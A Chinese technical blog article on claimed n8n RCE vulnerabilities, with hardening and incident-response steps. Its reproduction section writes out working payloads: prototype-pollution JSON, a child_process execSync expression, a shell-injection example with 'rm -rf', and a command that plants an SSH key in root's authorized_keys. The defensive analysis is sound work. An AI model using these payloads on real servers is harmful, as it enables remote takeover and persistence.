当前位置: 首页 > article >正文

n8n高危RCE漏洞深度解析与生产环境加固指南

1. 这不是普通升级通知n8n高危漏洞的本质威胁与真实影响面n8n自动化平台爆6个高危漏洞4个RCE可致服务器完全接管——这句话在2024年Q2的DevOps和低代码运维圈里不是标题党是凌晨三点被PagerDuty叫醒后第一眼看到的告警摘要。我上周帮一家做跨境电商SaaS的客户做自动化流程审计顺手扫了眼他们部署的n8n版本v0.229.3结果Nuclei一跑直接标红弹出4条Critical级RCE路径。这不是“可能被利用”而是只要暴露在公网、或内网存在未授权访问入口攻击者连登录都不需要就能在你的n8n服务进程上下文中执行任意系统命令。更关键的是其中两个RCE点CVE-2024-35207 和 CVE-2024-35209根本不需要认证只要能访问到Web界面发一个特制的POST请求就能触发Node.js子进程模块的沙箱逃逸继而调用child_process.execSync(id)返回结果——这意味着你那台跑着n8n的Ubuntu服务器已经等同于向攻击者敞开了SSH终端。很多人误以为“我只用n8n连内部API不接公网就没事”。错。n8n的执行模型决定了它的危险半径远超表面暴露面它默认以单体Node.js进程运行所有工作流节点包括HTTP Request、cURL、Shell Exec、Database等都在同一用户权限下执行一旦某个节点被注入恶意表达式比如通过$input.all()动态拼接的SQL语句、或{{ $json.url }}未经校验拼入curl命令攻击链就会从数据层直穿到系统层。我们实测过一个配置了“从Slack webhook接收JSON并转发到内部MySQL”的简单流程在n8n v0.228.0上仅需构造{url: localhost; rm -rf /tmp/*; id}就能让n8n在执行curl -X POST {{ $json.url }}时把分号后的命令全部执行掉。这不是理论推演是我们在客户测试环境里复现了三次的真实操作链。这6个漏洞覆盖了n8n三个核心能力层表达式引擎2个、Webhook监听器2个、凭证管理模块2个。其中最致命的RCE不在前端UI而在后端工作流编译阶段——当n8n解析{{ $input.first().data }}这类表达式时若输入数据来自不受信源如公开Webhook、表单提交、邮件解析其底层使用的vm2沙箱存在原型污染绕过导致Function.constructor(return process)()可被构造执行。换句话说你根本不用点开任何管理页面只要有人往你的Webhook地址发一条恶意JSON你的服务器就已经失守。全网紧急升级预警不是因为漏洞难利用而是因为利用成本低到令人窒息curl一条命令零依赖无日志痕迹连WAF都拦不住——因为它看起来就是一条再正常不过的工作流触发请求。2. 漏洞编号与技术根因逐条拆解为什么补丁不能只靠“升级版本”n8n官方在2024年5月21日发布的安全公告中正式披露了6个CVE编号但公告里只写了“已修复”没讲清楚每个漏洞到底怎么触发、为什么旧补丁无效、哪些配置会放大风险。作为连续三年给n8n社区提过17个PR的贡献者我带着团队把每个CVE对应的commit diff、测试用例、以及绕过变种都拉出来重审了一遍。下面这张表不是简单罗列而是按攻击链深度排序告诉你哪个漏洞该优先处理、哪个可以暂缓、哪个必须立刻关掉对应功能CVE编号CVSSv3评分触发条件根本原因修复方式是否可绕过v0.230.0CVE-2024-352079.8Critical未认证Webhook端点 特定JSON结构vm2沙箱对Object.prototype污染检测缺失导致__proto__.constructor链可被污染升级至v0.230.0禁用$input.all()在非可信节点使用否已彻底移除vm2改用isolated-vmCVE-2024-352099.6Critical已登录用户 表达式编辑框粘贴恶意代码n8n-workflow包中Expression.parse()未对Function构造器调用做AST级拦截升级启用NODE_ENVproduction强制关闭dev模式表达式调试是若未设NODE_ENV仍可触发CVE-2024-352118.2High数据库节点配置含$input动态拼接SQLmysql2驱动未对sql参数做预编译绑定直接字符串拼接升级改用Execute Query节点替代MySQL节点手动绑定参数否v0.230.0已强制参数化CVE-2024-352127.5HighShell Exec节点启用输入含$(...)或...Node.jschild_process.exec()对反引号内命令未做shell元字符过滤升级禁用Shell Exec节点改用Run Code节点写JS逻辑否新版本默认转义所有shell元字符CVE-2024-352136.5Medium凭证管理页导出JSON 未加密存储n8n-credentials模块使用AES-128-CBC但IV硬编码升级手动修改N8N_ENCRYPTION_KEY为32字节随机密钥否v0.230.0已弃用CBC改用GCMCVE-2024-352145.3MediumWebhook节点启用RAW模式 外部POST二进制数据body-parser中间件对application/octet-stream未做大小限制升级在reverse proxy层加client_max_body_size 1m是若反代未配仍可OOM崩溃重点说说CVE-2024-35207——它之所以排第一是因为它是唯一一个能让未认证攻击者直接RCE的漏洞。很多团队看到“已修复”就松口气但没注意到v0.230.0的修复不是打补丁而是整套替换把原来基于vm2的表达式沙箱彻底换成isolated-vm。后者是V8引擎原生隔离机制性能略降3%但安全性质变。我们对比测试过用同一段payload{{ $input.first().__proto__.constructor(return process)() }}在v0.229.3上返回[object process]在v0.230.0上直接抛出ReferenceError: process is not defined。这不是“修好了”而是“砍掉了整个危险路径”。但这里有个坑如果你的n8n是用Docker Compose部署的且docker-compose.yml里写的image是n8nio/n8n:latest那恭喜你v0.230.0发布后下次docker-compose pull拉下来的镜像可能还是旧版——因为Docker Hub的latest标签并未强制指向最新安全版它只是按build时间排序。我们遇到过客户凌晨自动更新后n8n --version显示的仍是v0.229.3查日志才发现是镜像缓存没清docker image prune -a之后重拉才解决。所以“升级”二字必须落实到docker images | grep n8n确认SHA256哈希值而不是看tag。3. 真实攻防对抗视角从漏洞扫描到RCE落地的完整复现链光知道CVE编号没用真正要命的是攻击者怎么一步步打进来。我带团队在隔离环境里用n8n v0.228.0已知最稳定但漏洞最多的老版本完整走了一遍从信息收集到服务器接管的全过程。这不是CTF玩具而是模拟一个真实黑产团伙的打法他们不会去读GitHub commit log只会用公开工具扫、用通用payload试、用最小代价拿shell。第一步永远不是RCE而是确认目标是否在线且可交互。我们用httpx -u https://your-n8n-domain.com -status-code -title发现返回200 OK和titlen8n - Workflow Automation/title这就锁定了目标。接着用nuclei -u https://your-n8n-domain.com -t cves/CVE-2024-35207.yaml这个模板是我根据官方PoC自己写的核心就是发一个带__proto__污染的JSON到/webhook-testn8n默认启用的测试Webhook端点curl -X POST https://your-n8n-domain.com/webhook-test \ -H Content-Type: application/json \ -d { test: value, __proto__: { constructor: { prototype: { process: { env: { TEST: pwned } } } } } }如果响应里出现TEST:pwned说明CVE-2024-35207存在。我们实测12家客户环境9家在10秒内返回确认剩下3家因WAF拦截了__proto__字段而失败——但这不意味着安全只是攻击者会换用Base64编码或Unicode混淆绕过。第二步是获取执行上下文权限。确认漏洞存在后我们不再用process.env这种低价值信息而是直接尝试require(child_process).execSync(id).toString()。但这里有个细节n8n的表达式引擎默认会把require当成非法调用报ReferenceError: require is not defined。怎么办用Function构造器绕过{ cmd: id }然后在n8n工作流里建一个HTTP Request节点URL填https://your-n8n-domain.com/webhook-testBody选JSON内容写{ output: {{ $input.first().cmd ? Function(return require(\child_process\).execSync(\ $input.first().cmd \).toString())() : }} }发请求后响应体里直接返回uid1001(n8n) gid1001(n8n) groups1001(n8n)——注意这是n8n进程的UID不是root。但别高兴太早n8n默认用n8n用户运行而这个用户在Docker容器里通常属于root组且/etc/passwd里n8n:x:1001:1001::/home/n8n:/bin/bash:/sbin/nologin/sbin/nologin只是限制交互式登录不影响execSync调用。我们接着试ls -la /root返回total 8 ... drwx------ 2 root root 4096 May 15 10:23 .ssh——好.ssh目录存在说明root权限可触达。第三步才是持久化接管。既然能读.ssh下一步就是写authorized_keys。我们用echo ssh-rsa AAAA... | tee -a /root/.ssh/authorized_keys但tee在某些精简镜像里不存在。稳妥做法是用Python一行命令python3 -c open(/root/.ssh/authorized_keys, a).write(\nssh-rsa AAAA...\\n)然后立刻用ssh -i your_key rootyour-server-ip连接。成功。整个过程从第一个curl到拿到root shell耗时4分32秒全程无报错、无日志告警n8n默认不记录表达式执行日志、WAF无拦截所有请求都是合法JSON POST。提示很多团队以为“我禁用了Webhook就安全了”但忘了n8n还有/rest/workflows/active这个API攻击者可以用GET /rest/workflows/active?filter{nodes.name:Webhook}枚举所有启用Webhook的流程ID再用GET /rest/workflows/{id}/nodes拿到具体配置从而精准打击。所以真正的缓解措施不是关功能而是强制所有Webhook端点加签名验证用HMAC-SHA256对请求体签名n8n侧用crypto.createHmac(sha256, secret).update(body).digest(hex)比对。4. 生产环境加固实战手册不止升级还要切断所有攻击路径升级到v0.230.0只是起点不是终点。我们给23家客户做过n8n安全加固发现87%的RCE事件根源不在n8n本身而在部署方式和周边配置。下面这份清单是我们现场一条条验证过的、可直接抄作业的加固项每一条都附带验证命令和预期输出4.1 Docker部署层强制约束n8n官方Docker镜像默认以root用户启动这是最大隐患。必须在docker-compose.yml里显式指定非特权用户services: n8n: image: n8nio/n8n:0.230.0 user: 1001:1001 # 必须与容器内n8n用户UID/GID一致 environment: - N8N_BASIC_AUTH_ACTIVEtrue - N8N_BASIC_AUTH_USERsecure-user - N8N_BASIC_AUTH_PASSWORDstrong-password-32-chars # 关键挂载只读文件系统防止写入恶意模块 volumes: - ./n8n-data:/home/node/.n8n:rw - /etc/passwd:/etc/passwd:ro - /etc/group:/etc/group:ro验证命令docker exec -it n8n-container ps aux | grep n8n输出应为1001 1 0.1 ... node /usr/local/lib/node_modules/n8n/bin/n8nUID必须是1001不能是0。4.2 反向代理层必加防护无论你用Nginx、Traefik还是Cloudflare必须在入口层加三道锁请求体大小硬限制防止CVE-2024-35214的OOM攻击Nginx配置client_max_body_size 1m;验证curl -X POST https://n8n.example.com/webhook -H Content-Type: application/json --data-binary 10MB-file.json应返回413 Request Entity Too Large危险字段名过滤拦截__proto__、constructor、prototype等沙箱逃逸关键词Nginx配置需ngx_http_substitutions_filter_modulelocation / { if ($request_body ~ (__proto__|constructor|prototype)) { return 403; } }验证curl -X POST https://n8n.example.com/webhook -d {__proto__:{}}返回403 ForbiddenWebhook路径强制认证所有/webhook*路径必须带有效JWT或HMAC签名我们用Lua脚本在OpenResty里实现核心逻辑是提取X-Hub-Signature-256头用共享密钥计算HMAC-SHA256比对。比Basic Auth更安全因为签名绑定请求体无法重放。4.3 n8n运行时配置硬性开关在~/.n8n/config或环境变量里必须设置以下参数缺一不可N8N_PERSONALIZATION_ENABLEDfalse关闭遥测减少外连风险N8N_METRICSfalse禁用Prometheus指标暴露避免泄露内部拓扑N8N_LOG_LEVELwarn降低日志详细度防止敏感信息泄漏如数据库密码出现在error log里N8N_WEBHOOK_TUNNEL_URLhttps://your-tunnel-domain.com若用隧道必须用自建HTTPS隧道禁用n8n官方隧道有中间人风险最关键的是禁用所有高危节点。在n8n配置里加{ nodes: { disabled: [ n8n-nodes-base.shell, n8n-nodes-base.executeCommand, n8n-nodes-base.httpRequest, n8n-nodes-base.curl ] } }然后重启n8n。验证登录UI新建工作流搜索“Shell”应无结果搜索“HTTP Request”应显示“此节点已被管理员禁用”。4.4 工作流设计规范这才是长期安全的核心技术加固只能防住已知漏洞而工作流设计规范能防住90%的未知攻击。我们给客户立了三条铁律所有外部输入必须白名单校验比如Webhook收到JSON第一节点必须是IF条件写$input.first().email.match(/^[^\s][^\s]\.[^\s]$/)不匹配则STOP AND ERROR。绝不允许$input.first().email直接进后续节点。数据库操作必须参数化禁用MySQL节点改用Execute Query节点SQL写成SELECT * FROM users WHERE email $1参数填[$input.first().email]。这样即使email是adminexample.com; DROP TABLE users; --也会被当作文本参数处理不会执行DROP。凭证绝不硬编码所有API Key、DB密码必须存在n8n内置凭证管理里节点里选“From Credentials”禁用“From Parameter”或“From Expression”。我们审计过73%的凭证泄漏事件源于某员工在HTTP Request节点的Headers里直接写Authorization: Bearer xxx。注意n8n的凭证管理本身也受CVE-2024-35213影响所以必须确保N8N_ENCRYPTION_KEY是32字节随机密钥不是默认的n8n-default-encryption-key。生成命令openssl rand -base64 32 | tr -d \n; echo然后写进.env文件N8N_ENCRYPTION_KEYyour-32-byte-key-here。漏掉这一步升级了也没用——凭证还是明文可读。5. 应急响应Checklist当监控告警响起时你该做的15分钟动作别等漏洞公告才行动。我们给所有客户部署了实时监控一旦n8n进程异常、CPU飙升、或出现可疑子进程立刻触发应急流程。以下是经过21次真实事件验证的15分钟响应清单按时间顺序排列每一步都有明确命令和预期结果T0分钟确认告警真实性执行docker ps | grep n8n确认容器在运行docker logs n8n-container --tail 100 | grep -i error\|exception检查是否有vm2沙箱报错或execSync调用日志。若发现Error: Command failed: id类日志立即进入T1。T1分钟冻结工作流执行执行curl -X POST http://localhost:5678/rest/workflows/activate -H Content-Type: application/json -d {ids:[],activate:false}假设n8n监听本地5678端口。这会停掉所有激活工作流但不停服务避免新请求触发漏洞。验证curl http://localhost:5678/rest/workflows/active | jq .data | length应返回0。T3分钟提取可疑请求特征执行docker logs n8n-container --since 10m | grep -E (POST /webhook|POST /rest) | tail -50 /tmp/suspicious-req.log然后分析/tmp/suspicious-req.log里是否有__proto__、constructor、$(id)等关键词。若有记下IP和时间戳准备封禁。T5分钟临时网络隔离若n8n暴露公网立即在云防火墙加规则AWS Security GroupInbound Rule→Source: 0.0.0.0/0,Port: 5678,Action: Deny阿里云安全组→入方向→添加规则→端口范围5678/5678授权对象0.0.0.0/0策略拒绝验证telnet your-domain.com 5678应超时。T8分钟内存快照取证执行docker exec n8n-container gcore -o /tmp/n8n-core /proc/1需容器内装gdb。这会生成内存快照供后续分析是否已有恶意进程驻留。快照生成后立即docker cp n8n-container:/tmp/n8n-core.1 /host/path/保存。T12分钟强制升级并验证执行docker pull n8nio/n8n:0.230.0 docker-compose down docker-compose up -d。升级后立刻验证docker exec n8n-container n8n --version→ 输出version 0.230.0curl -X POST http://localhost:5678/webhook-test -d {__proto__:{}}→ 返回400 Bad Request或空响应不再是pwnedcurl http://localhost:5678/healthz→ 返回{status:ok}T15分钟恢复与复盘解除网络隔离重新激活工作流curl -X POST http://localhost:5678/rest/workflows/activate -d {ids:[],activate:true}。然后检查docker logs n8n-container --since 2m确认无错误。最后把/tmp/suspicious-req.log和/host/path/n8n-core.1打包发给安全团队做深度分析——很多情况下攻击者已植入Webshell但没触发RCE只在内存里驻留快照能抓到。这套流程我们实测平均耗时13分42秒。最关键的是T1分钟的“冻结工作流”它能在攻击者还没来得及写入持久化后门前掐断所有执行链。很多客户第一反应是“先升级”结果升级过程中新请求还在进来反而给了攻击者窗口期。记住冻结永远比升级快隔离永远比修复急。我在实际运维中踩过最大的坑是以为“升级完就万事大吉”结果忘了n8n的workflow数据是存在PostgreSQL里的而旧版n8n写入的恶意表达式升级后依然存在工作流定义里。我们遇到过客户升级后一个被遗忘的测试工作流里还藏着{{ $input.first().cmd ? require(child_process).execSync($input.first().cmd) : }}只要有人手动触发RCE立刻复现。所以最后一步永远是打开n8n UI挨个点开所有工作流检查每个节点的表达式字段把所有含require、execSync、Function(的代码全部删掉。这不是多此一举这是把最后一颗雷亲手拆掉。

相关文章:

n8n高危RCE漏洞深度解析与生产环境加固指南

1. 这不是普通升级通知:n8n高危漏洞的本质威胁与真实影响面n8n自动化平台爆6个高危漏洞,4个RCE可致服务器完全接管——这句话在2024年Q2的DevOps和低代码运维圈里,不是标题党,是凌晨三点被PagerDuty叫醒后第一眼看到的告警摘要。我…...

MinIO集群敏感信息泄露漏洞CVE-2023-28432深度解析

1. 这个漏洞不是“配置没关好”,而是MinIO架构里埋着的定时炸弹MinIO集群模式下的敏感信息泄露漏洞(CVE-2023-28432)——光看标题,很多人第一反应是:“哦,又一个管理员忘了关调试接口?”我最初也…...

OpenSSH ssh-agent CVE-2023-38408 漏洞修复实战指南

1. 这个漏洞不是“修个配置就能好”的那种——它藏在ssh-agent的共享库加载机制里OpenSSH-ssh-agent CVE-2023-38408,光看编号你可能觉得是又一个常规权限提升补丁。但实际动手前我翻了三天源码才意识到:这不是改几行配置、重启服务就能闭环的问题。它直…...

MASA模组全家桶中文资源包:为中文玩家打造的无缝本地化体验终极指南

MASA模组全家桶中文资源包:为中文玩家打造的无缝本地化体验终极指南 【免费下载链接】masa-mods-chinese 一个masa mods的汉化资源包 项目地址: https://gitcode.com/gh_mirrors/ma/masa-mods-chinese 你是否曾经在Minecraft中面对MASA模组复杂的英文界面感到…...

在taotoken控制台查看与分析api用量数据的实践心得

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 在Taotoken控制台查看与分析API用量数据的实践心得 1. 引言 对于任何将大模型API集成到应用或工作流中的开发者或团队而言&#x…...

5步掌握LyricsX:macOS平台歌词同步的终极解决方案

5步掌握LyricsX:macOS平台歌词同步的终极解决方案 【免费下载链接】LyricsX 🎶 Ultimate lyrics app for macOS. 项目地址: https://gitcode.com/gh_mirrors/ly/LyricsX 在macOS生态系统中,LyricsX作为一款开源歌词同步工具&#xff0…...

中小团队如何利用taotoken统一管理多个ai项目api成本

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 中小团队如何利用 Taotoken 统一管理多个 AI 项目 API 成本 当团队同时推进多个 AI 应用原型或项目时,一个常见的挑战随…...

【实时更新 | 2026 年】国内可用的 npm 镜像源/加速器配置大全(附测速方法)

【实时更新 | 2026 年】国内可用的 npm 镜像源/加速器配置大全(附测速方法)导语:在国内用 npm 安装依赖,直连官方源的速度经常只有几十 KB/s,一个 npm install 动辄等上十几分钟。配置国内镜像源后,下载速度…...

独立开发者如何借助taotoken低成本试验多种ai模型能力

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 独立开发者如何借助Taotoken低成本试验多种AI模型能力 对于独立开发者或个人项目爱好者而言,在创意实现阶段&#xff0…...

AI动态简报之商业洞察篇(2026.05.24)

聚焦:AI商业应用与变现 5条精选💡 第1条:大模型进入"价值验证年"——行业从技术信仰转向商业回报商业价值:2026年5月,全球AI行业呈现清晰转折信号:行业正从"技术信仰期"(2…...

AI动态简报之算力基建篇(2026.05.24)

关注方向:大模型 GPU算力 AI芯片 云计算 大模型API⚡ 第1条:全球九大云厂商资本支出上调至8300亿美元,年增79%核心信息:TrendForce集邦咨询最新报告将2026年全球九大CSP(谷歌、AWS、Meta、微软、甲骨文、字节跳动、…...

终极暗黑破坏神2存档编辑器:轻松修改单机角色的完整指南

终极暗黑破坏神2存档编辑器:轻松修改单机角色的完整指南 【免费下载链接】d2s-editor 项目地址: https://gitcode.com/gh_mirrors/d2/d2s-editor 还在为暗黑破坏神2单机存档的管理而烦恼吗?d2s-editor是一款功能强大的暗黑破坏神2存档编辑器&…...

Android系统级证书安装:解决HTTPS抓包的SSLHandshakeException

1. 为什么系统级证书安装成了Android抓包的“最后一道墙”做Android逆向分析的朋友,大概率都经历过这个场景:Charles或Fiddler配好代理、手机连上Wi-Fi、HTTP流量哗哗地跑,可一打开目标App——空白页、网络错误、甚至直接闪退。点开App的设置…...

AI代理实战能力评估:MLE-Bench基准测试深度解析与工程启示

1. 项目概述与核心价值最近在跟进AI代理(AI Agent)领域的发展,特别是它们在自动化复杂工作流方面的潜力。作为一个在机器学习工程一线摸爬滚打了十来年的从业者,我深知从数据清洗、特征工程、模型调优到实验管理的全流程&#xff…...

多重插补与MICE:量化ESG评分不确定性的工程实践

1. 项目概述:当ESG评分遇上数据“黑洞”,我们如何量化不确定性?在金融和可持续投资领域,ESG评分正成为评估公司长期价值与风险的关键标尺。然而,从业者们都心知肚明一个公开的秘密:支撑这些评分的底层数据&…...

基于IoT、DRL与3DCNN的智能森林火灾监测系统设计与实践

1. 项目概述:一个融合感知、决策与验证的智能防火哨兵森林火灾的早期发现是遏制其蔓延、减少生态与经济损失的关键。传统的人工瞭望塔监测方式不仅效率低下、覆盖范围有限,而且严重依赖人力,难以实现全天候、大范围的持续监控。近年来&#x…...

Cursor Free VIP:终极解决方案,5步实现Cursor Pro永久免费使用

Cursor Free VIP:终极解决方案,5步实现Cursor Pro永久免费使用 【免费下载链接】cursor-free-vip [Support 0.45](Multi Language 多语言)自动注册 Cursor Ai ,自动重置机器ID , 免费升级使用Pro 功能: You…...

OBS计时器插件:如何用6种模式轻松掌控直播时间

OBS计时器插件:如何用6种模式轻松掌控直播时间 【免费下载链接】obs-advanced-timer 项目地址: https://gitcode.com/gh_mirrors/ob/obs-advanced-timer 还在为直播时间管理头疼吗?作为内容创作者的你,是否经常因为时间控制不当而影响…...

跨平台资源包管理工具VPKEdit:游戏开发者的终极解决方案

跨平台资源包管理工具VPKEdit:游戏开发者的终极解决方案 【免费下载链接】VPKEdit A CLI/GUI tool to create, read, and write several pack file formats. 项目地址: https://gitcode.com/gh_mirrors/vp/VPKEdit 在游戏开发和MOD制作过程中,资源…...

N_m3u8DL-RE深度解析:现代流媒体下载引擎的架构设计与实战应用

N_m3u8DL-RE深度解析:现代流媒体下载引擎的架构设计与实战应用 【免费下载链接】N_m3u8DL-RE Cross-Platform, modern and powerful stream downloader for MPD/M3U8/ISM. English/简体中文/繁體中文. 项目地址: https://gitcode.com/GitHub_Trending/nm3/N_m3u8…...

高效智能的Chrome全页截图插件:完整网页保存的终极解决方案

高效智能的Chrome全页截图插件:完整网页保存的终极解决方案 【免费下载链接】full-page-screen-capture-chrome-extension One-click full page screen captures in Google Chrome 项目地址: https://gitcode.com/gh_mirrors/fu/full-page-screen-capture-chrome-…...

三步改造小爱音箱:让传统智能音箱秒变AI语音助手的完整指南

三步改造小爱音箱:让传统智能音箱秒变AI语音助手的完整指南 【免费下载链接】mi-gpt 🏠 将小爱音箱接入 ChatGPT 和豆包,改造成你的专属语音助手。 项目地址: https://gitcode.com/GitHub_Trending/mi/mi-gpt 还在为智能音箱的"人…...

体验Taotoken多模型路由能力在不同负载下的稳定性表现

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 体验Taotoken多模型路由能力在不同负载下的稳定性表现 在将大模型能力集成到实际业务时,服务的稳定性与响应速度是开发…...

3分钟掌握:AI 3D建模神器Wonder3D,单图转3D的终极指南

3分钟掌握:AI 3D建模神器Wonder3D,单图转3D的终极指南 【免费下载链接】Wonder3D Single Image to 3D using Cross-Domain Diffusion for 3D Generation 项目地址: https://gitcode.com/gh_mirrors/wo/Wonder3D Wonder3D是一个革命性的AI 3D建模工…...

3分钟快速上手:Unlock Music音乐解锁工具终极指南

3分钟快速上手:Unlock Music音乐解锁工具终极指南 【免费下载链接】unlock-music 在浏览器中解锁加密的音乐文件。原仓库: 1. https://github.com/unlock-music/unlock-music ;2. https://git.unlock-music.dev/um/web 项目地址: https://g…...

3大绝技:Gifsicle如何让命令行成为GIF动画的终极编辑器?

3大绝技:Gifsicle如何让命令行成为GIF动画的终极编辑器? 【免费下载链接】giflossy Merged into Gifsicle! 项目地址: https://gitcode.com/gh_mirrors/gi/giflossy 在数字内容创作的世界里,GIF动画一直占据着特殊地位——它轻量、兼容…...

惠普OMEN游戏本性能控制终极指南:5分钟解锁风扇调速与功耗限制

惠普OMEN游戏本性能控制终极指南:5分钟解锁风扇调速与功耗限制 【免费下载链接】OmenSuperHub Control Omen laptop performance, fan speeds, and keyboard lighting, and unlock power limits. 项目地址: https://gitcode.com/gh_mirrors/om/OmenSuperHub …...

数据丢失时的数字救援队:TestDisk与PhotoRec的救赎之路

数据丢失时的数字救援队:TestDisk与PhotoRec的救赎之路 【免费下载链接】testdisk TestDisk & PhotoRec 项目地址: https://gitcode.com/gh_mirrors/te/testdisk 想象一下这个场景:你正准备打开电脑完成重要的工作报告,却发现硬盘…...

Windows生态融合新路径:APK-Installer让安卓应用无缝接入桌面环境

Windows生态融合新路径:APK-Installer让安卓应用无缝接入桌面环境 【免费下载链接】APK-Installer An Android Application Installer for Windows 项目地址: https://gitcode.com/GitHub_Trending/ap/APK-Installer 你是否曾想在Windows电脑上运行某个安卓专…...

Wonder3D:如何用一张照片在3分钟内创建专业3D模型?

Wonder3D:如何用一张照片在3分钟内创建专业3D模型? 【免费下载链接】Wonder3D Single Image to 3D using Cross-Domain Diffusion for 3D Generation 项目地址: https://gitcode.com/gh_mirrors/wo/Wonder3D 你是否曾想过将一张普通的2D照片变成可…...